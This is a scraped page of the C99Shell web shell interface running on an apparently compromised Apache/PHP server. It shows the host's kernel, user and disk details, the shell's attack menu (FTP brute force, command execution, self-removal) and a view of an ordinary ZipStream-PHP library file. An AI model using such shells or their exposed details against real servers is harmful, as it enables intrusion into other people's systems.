!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/maennchen/zipstream-php/src/Option/   drwxr-xr-x
Free 13.36 GB of 57.97 GB (23.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     File.php (1.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
declare(strict_types=1);

namespace 
ZipStream\Option;

use 
DateTime;

final class 
File
{
    
/**
     * @var string
     */
    
private $comment '';
    
/**
     * @var Method
     */
    
private $method;
    
/**
     * @var int
     */
    
private $deflateLevel;
    
/**
     * @var DateTime
     */
    
private $time;
    
/**
     * @var int
     */
    
private $size 0;

    public function 
defaultTo(Archive $archiveOptions): void
    
{
        
$this->deflateLevel $this->deflateLevel ?: $archiveOptions->getDeflateLevel();
        
$this->time $this->time ?: new DateTime();
    }

    
/**
     * @return string
     */
    
public function getComment(): string
    
{
        return 
$this->comment;
    }

    
/**
     * @param string $comment
     */
    
public function setComment(string $comment): void
    
{
        
$this->comment $comment;
    }

    
/**
     * @return Method
     */
    
public function getMethod(): Method
    
{
        return 
$this->method ?: Method::DEFLATE();
    }

    
/**
     * @param Method $method
     */
    
public function setMethod(Method $method): void
    
{
        
$this->method $method;
    }

    
/**
     * @return int
     */
    
public function getDeflateLevel(): int
    
{
        return 
$this->deflateLevel ?: Archive::DEFAULT_DEFLATE_LEVEL;
    }

    
/**
     * @param int $deflateLevel
     */
    
public function setDeflateLevel(int $deflateLevel): void
    
{
        
$this->deflateLevel $deflateLevel;
    }

    
/**
     * @return DateTime
     */
    
public function getTime(): DateTime
    
{
        return 
$this->time;
    }

    
/**
     * @param DateTime $time
     */
    
public function setTime(DateTime $time): void
    
{
        
$this->time $time;
    }

    
/**
     * @return int
     */
    
public function getSize(): int
    
{
        return 
$this->size;
    }

    
/**
     * @param int $size
     */
    
public function setSize(int $size): void
    
{
        
$this->size $size;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.007 ]--